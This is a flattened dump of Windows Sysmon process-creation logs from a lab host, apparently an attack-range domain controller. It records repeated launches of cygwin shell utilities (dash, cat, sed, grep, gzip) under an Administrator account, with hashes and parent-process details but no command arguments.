14:55:55.851{A8622C2F-53FB-6078-4C09-00000000AE01}5184C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-4A09-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.851{A8622C2F-53FB-6078-4B09-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049216Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.844{A8622C2F-53FB-6078-4A09-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.836{A8622C2F-53FB-6078-4909-00000000AE01}1476C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-4809-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049193Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.829{A8622C2F-53FB-6078-4809-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049181Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.820{A8622C2F-53FB-6078-4709-00000000AE01}5396C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-4509-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049164Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.813{A8622C2F-53FB-6078-4609-00000000AE01}924C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-4309-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.812{A8622C2F-53FB-6078-4509-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.805{A8622C2F-53FB-6078-4409-00000000AE01}2112C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-4209-00000000AE01}4424C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049140Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.805{A8622C2F-53FB-6078-4309-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.798{A8622C2F-53FB-6078-4209-00000000AE01}4424C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049116Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.790{A8622C2F-53FB-6078-4109-00000000AE01}5804C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-4009-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049106Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.783{A8622C2F-53FB-6078-4009-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049094Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.775{A8622C2F-53FB-6078-3F09-00000000AE01}5664C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-3D09-00000000AE01}6452C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049075Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.767{A8622C2F-53FB-6078-3E09-00000000AE01}3208C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-3B09-00000000AE01}2952C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049074Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.767{A8622C2F-53FB-6078-3D09-00000000AE01}6452C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049054Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.759{A8622C2F-53FB-6078-3C09-00000000AE01}6084C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-3A09-00000000AE01}6652C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049053Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.759{A8622C2F-53FB-6078-3B09-00000000AE01}2952C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049041Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.752{A8622C2F-53FB-6078-3A09-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049029Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.744{A8622C2F-53FB-6078-3909-00000000AE01}3368C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-3809-00000000AE01}5832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049019Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.737{A8622C2F-53FB-6078-3809-00000000AE01}5832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049006Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.729{A8622C2F-53FB-6078-3709-00000000AE01}6456C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-3509-00000000AE01}1156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048987Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.721{A8622C2F-53FB-6078-3609-00000000AE01}1476C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-3309-00000000AE01}5620C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.721{A8622C2F-53FB-6078-3509-00000000AE01}1156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048967Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.714{A8622C2F-53FB-6078-3409-00000000AE01}5396C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-3209-00000000AE01}5828C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048966Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.714{A8622C2F-53FB-6078-3309-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048954Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.707{A8622C2F-53FB-6078-3209-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.699{A8622C2F-53FB-6078-3109-00000000AE01}1140C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-3009-00000000AE01}4300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.692{A8622C2F-53FB-6078-3009-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.684{A8622C2F-53FB-6078-2F09-00000000AE01}4424C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-2D09-00000000AE01}4364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048901Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.677{A8622C2F-53FB-6078-2E09-00000000AE01}4568C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-2C09-00000000AE01}6364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048899Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.676{A8622C2F-53FB-6078-2D09-00000000AE01}4364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048880Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.669{A8622C2F-53FB-6078-2C09-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.669{A8622C2F-53FB-6078-2B09-00000000AE01}5664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-2A09-00000000AE01}4384C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048866Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.662{A8622C2F-53FB-6078-2A09-00000000AE01}4384C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.654{A8622C2F-53FB-6078-2909-00000000AE01}6968C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-2809-00000000AE01}6448C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048844Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.646{A8622C2F-53FB-6078-2809-00000000AE01}6448C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.638{A8622C2F-53FB-6078-2709-00000000AE01}4160C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-2509-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.630{A8622C2F-53FB-6078-2609-00000000AE01}3368C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-2309-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048811Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.630{A8622C2F-53FB-6078-2509-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.623{A8622C2F-53FB-6078-2409-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-2209-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048791Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.623{A8622C2F-53FB-6078-2309-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 